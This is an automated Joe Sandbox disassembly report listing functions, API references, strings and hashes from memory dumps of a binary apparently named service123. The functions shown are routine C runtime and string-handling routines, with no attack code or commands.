Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: c10b4adf425795398ae46a1a06dafcf56822d8296dae9dc9297e7f72a4414306
Instruction ID: 4b4200e69d494de627ba63fc7824a2c443aee38c0cc9adfda2bd3b1c29649317
Opcode Fuzzy Hash: c10b4adf425795398ae46a1a06dafcf56822d8296dae9dc9297e7f72a4414306
Instruction Fuzzy Hash: F0A10275D153188FCB14DFA8C58569DBBF1BF49314F24892ED498AB750E730A889CF82

Function 6CA8BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA8C03F
memcpy.MSVCRT ref: 6CA8C099
memcpy.MSVCRT ref: 6CA8C127

Part of subcall function 6CA8C500: memcpy.MSVCRT ref: 6CA8C58C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA8C1B3
basic_string::replace, xrefs: 6CA8C194, 6CA8C1A7

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: add189645ee900edeaaddc00fb95d52e8d02b1b323f79e28cdb067978658f562
Instruction ID: ed64fada1f6f66dcb803a0b2823320fabf1c493109575ec8fb12a89ff72d5a46
Opcode Fuzzy Hash: add189645ee900edeaaddc00fb95d52e8d02b1b323f79e28cdb067978658f562
Instruction Fuzzy Hash: 1D813671A062159FCB00EF28D58059EBBF1FF88758F158A2DE8988B710E730D995CB92

Function 6CA95000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA950D0
memcpy.MSVCRT ref: 6CA95124
memcpy.MSVCRT ref: 6CA951B8

Part of subcall function 6CA95590: memcpy.MSVCRT ref: 6CA95620

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA95248
basic_string::replace, xrefs: 6CA95229, 6CA9523C

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 1761b20f1de07eb95ee0cb91998e8abeadb0f4496ab921db6450318ebe30476e
Instruction ID: f2a5fbf098bba28b15bb50f4b234c9b2265f6b476cd684085e2fc80f42a26da1
Opcode Fuzzy Hash: 1761b20f1de07eb95ee0cb91998e8abeadb0f4496ab921db6450318ebe30476e
Instruction Fuzzy Hash: 44815771A193159FCB00DF6DC58269EBBF1AF88354F148A2EE899D7710D730D894CB92

Function 6CA9D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CABF8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABF95D
Part of subcall function 6CABF8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABF988

strlen.MSVCRT ref: 6CA9D8E5
memcpy.MSVCRT ref: 6CA9D9BE

Strings

iostream error, xrefs: 6CA9DA12
Unknown error, xrefs: 6CA9D85E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: a9a84a6ee2f4ee7c9fe4666b551837e4c64262264cf96a0901829bfef8bb0343
Instruction ID: 8432b7fd5050e1ead4abe75aef5c58d6e5c12758a47b746ce597422ac5328e4b
Opcode Fuzzy Hash: a9a84a6ee2f4ee7c9fe4666b551837e4c64262264cf96a0901829bfef8bb0343
Instruction Fuzzy Hash: D661E3B4904308CFCB04DFA9C58569EBBF1BF88314F14892EE4989B755E7749889CF92

Function 6CA2F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6CA2F85F
ReleaseSemaphore.KERNEL32 ref: 6CA2F8E3

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 21414085df752b682220cb413a98bf3599cd7f6d7ab7affdd17e3cff91220793
Instruction ID: 617260ea37b7b707b0a028f9468d9a9e509ad384151a1b3b0c05ca45946a0831
Opcode Fuzzy Hash: 21414085df752b682220cb413a98bf3599cd7f6d7ab7affdd17e3cff91220793
Instruction Fuzzy Hash: 1C318B70A0A3218FDB04EF28D9487067BF4FB46319F09C21DD8A897384C378D486DB92

Function 6CA2FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6CA2FCEC
ReleaseSemaphore.KERNEL32 ref: 6CA2FD7C
CreateSemaphoreW.KERNEL32 ref: 6CA2FDC7
WaitForSingleObject.KERNEL32 ref: 6CA2FE10

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 4c47fcd4743a2c7c5c87d016c32fae4b1173105b40e50689ceefeffa9a34cead
Instruction ID: e697a1f492ad65c87ee021e0ec7c1c3694de7582e0b9a88f1eceaca685680d61
Opcode Fuzzy Hash: 4c47fcd4743a2c7c5c87d016c32fae4b1173105b40e50689ceefeffa9a34cead
Instruction Fuzzy Hash: 04315B70A0A3218FDB15AF29D9483067BF5BB4631DF18C61CD8598B384D378D886CF92

Function 6CAE8520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CAE8535
strlen.MSVCRT ref: 6CAE8583
memcpy.MSVCRT ref: 6CAE85A0
setlocale.MSVCRT ref: 6CAE85B4
setlocale.MSVCRT ref: 6CAE85EA

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 99cfa0bc6c0e7681d9689b9f9a34cf9490839ea2a90ae399a7defe591fcd61ee
Instruction ID: 831578c4f5da3ff9e047253fa73225370e31b1ddcd764ea2e5cba18ee0cc7988
Opcode Fuzzy Hash: 99cfa0bc6c0e7681d9689b9f9a34cf9490839ea2a90ae399a7defe591fcd61ee
Instruction Fuzzy Hash: 2221C4B1A0D3509FD340AF79D68065EBBE0AF88258F058A6EE5C8C7701E734C5899F82

Function 6CA39530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6CA39549
_unlock.MSVCRT ref: 6CA39571
calloc.MSVCRT ref: 6CA395BF

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 457593f9c3502fd1293bd412505bfde64d6e38e022528a0fd0ef86122780c438
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: C6113D719052218FE7409F38C690696BBE0AF45344F199669D49CCB745EF34D4C9CBA2

Function 6CA30290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6CA302BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA304DE), ref: 6CA302CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA304DE), ref: 6CA30300

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 26c49883dd07b0c352a85ef1a85f965a0a72bb053b55314a1b2bc5648d8b4227
Instruction ID: eb2b9b123675b8491e05b4cc7d648dcc3ab10175464f6a67f14a848dec32b6eb
Opcode Fuzzy Hash: 26c49883dd07b0c352a85ef1a85f965a0a72bb053b55314a1b2bc5648d8b4227
Instruction Fuzzy Hash: A8F03A7090D3119FD7007F79C61836A7AB4BB4232DF409B1CE0A9C7B94E7784088CB52

Function 007B4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 007B4647
(null), xrefs: 007B4C27

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 7bcc23b583bd29118131611bdb6943259afccb63b0b71897d877b99b9eddd731
Instruction ID: 69851897180e545c56262022aef88fd3015fe62b6ebe257753096ceda3ccc7b7
Opcode Fuzzy Hash: 7bcc23b583bd29118131611bdb6943259afccb63b0b71897d877b99b9eddd731
Instruction Fuzzy Hash: 7DA18B716083918BCB319F24C0907EABBE1BF85714F148A1DE9D997343D739D946DB82

Function 6CA352CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6CA34D17
(null), xrefs: 6CA352F7

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 27818c1f13003833b3ca285e6b6835bb6d41e8b109c50c626bfa8227b3ff8d49
Instruction ID: 3ab6065d8e0fd62d2e5487229febabc056542eab7c8b31460c9ecdd8b80b2727
Opcode Fuzzy Hash: 27818c1f13003833b3ca285e6b6835bb6d41e8b109c50c626bfa8227b3ff8d49
Instruction Fuzzy Hash: 6EA1707160C3658BD7218F29D4A079ABBE1BF85308F149A1DE8DCCB741D735D98ACB82

Function 007B1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 007B1DF3
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 007B1C20
Unknown pseudo relocation bit size %d., xrefs: 007B1C6D

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 32f9d37cd3ee8b5317b46a7294044d2bc6b80f5fe52413741b9da5b994f106dc
Instruction ID: 5073251f658d2522560c991a3c5c2d0501c14c2d1c57006556941789dc1c95dd
Opcode Fuzzy Hash: 32f9d37cd3ee8b5317b46a7294044d2bc6b80f5fe52413741b9da5b994f106dc
Instruction Fuzzy Hash: 3281B571A10305DBCB10EF28D8A47DABBF1FF84340FD58629D89497354E338E8148B96

Function 6CA2A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6CA2A970
Unknown pseudo relocation bit size %d., xrefs: 6CA2A9BD
Unknown pseudo relocation protocol version %d., xrefs: 6CA2AB43

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 0bdbd15b6b16d6d8f00dd091fb1f628552014f0508f964fbd72d8a2e254d5f16
Instruction ID: 8762e357711df1e36f9dce7dda0d8988e82dd8c214307d8e9e0a3d5b67079428
Opcode Fuzzy Hash: 0bdbd15b6b16d6d8f00dd091fb1f628552014f0508f964fbd72d8a2e254d5f16
Instruction Fuzzy Hash: 2071B172A0566A8BDB00CF69C580B9EBBF6FF44308F1D8529D855A7B05D338EC85CB91

Function 007B80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 007B80F2
strchr.MSVCRT ref: 007B8102
atoi.MSVCRT ref: 007B8113

Strings

., xrefs: 007B80F7

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 5d86f95f00d458ba270daad6f96daa719dd2c6b2f58c4550c21323d4c4bebad9
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: E5E0E6719057098AD7807F3CC90A35A75D96F40300F458C5CD4848B245DB7D9446DB53

Function 6CA39128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA39142
strchr.MSVCRT ref: 6CA39152
atoi.MSVCRT ref: 6CA39163

Strings

., xrefs: 6CA39147

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: 4517ea797941a9919cddaaabbd9934fce67c170b2dc304aefd5c91ac2c6f0e4a
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: B3E08CB0E047258AE7007F38C61839AB6E1BB80308F89992CC88CD7700EB39848E9742

Function 6CA39293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6CA3929F
GetProcAddress.KERNEL32 ref: 6CA392B3

Strings

advapi32.dll, xrefs: 6CA39298
SystemFunction036, xrefs: 6CA392A8

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 61373d3edf9bece5b858399d11046e6eb78e5f08ce8c32dc75ed92ea59b760d7
Instruction ID: 4f7997f4535bc28408a162428b2522397eec81eda5325f25c181a287c8c13e09
Opcode Fuzzy Hash: 61373d3edf9bece5b858399d11046e6eb78e5f08ce8c32dc75ed92ea59b760d7
Instruction Fuzzy Hash: CBE046B2D88B108FCB00BFB8960604ABFF0BA06324F01896AD08997604EB348444CF9B

Function 6CA31409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6CA314D2

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: b4a490b65db0ce1407744cea3526cab24ecf632a30115b8ffd2ff40d86fc07b2
Instruction ID: fc49c37a4c6c88e2c69b1c9f08ef2996f6e077e400afaae46812bee57ff68001
Opcode Fuzzy Hash: b4a490b65db0ce1407744cea3526cab24ecf632a30115b8ffd2ff40d86fc07b2
Instruction Fuzzy Hash: EF220175A087508FC720CF69C59465AFBE1BF88308F159A2EE9D8D7711D734E888CB82

Function 6CA2A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA2A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6CA3C41C), ref: 6CA2A3E0
free.MSVCRT ref: 6CA2A3EA

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: dd851303b8e11ee248d01c93bfa7bd72092d2ec9765f09c97b47b52928a406e8
Instruction ID: e21a312f003c52d50663b25e78ae4245ae14d6720ad51da7d71f32f9efdfb1cf
Opcode Fuzzy Hash: dd851303b8e11ee248d01c93bfa7bd72092d2ec9765f09c97b47b52928a406e8
Instruction Fuzzy Hash: E13182756097218BD3009F29D58431BBBE2AFC1758F2D0A2DE9A587B40D739DCC98791

Function 6CA75C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA75D74
memchr.MSVCRT ref: 6CA75D93

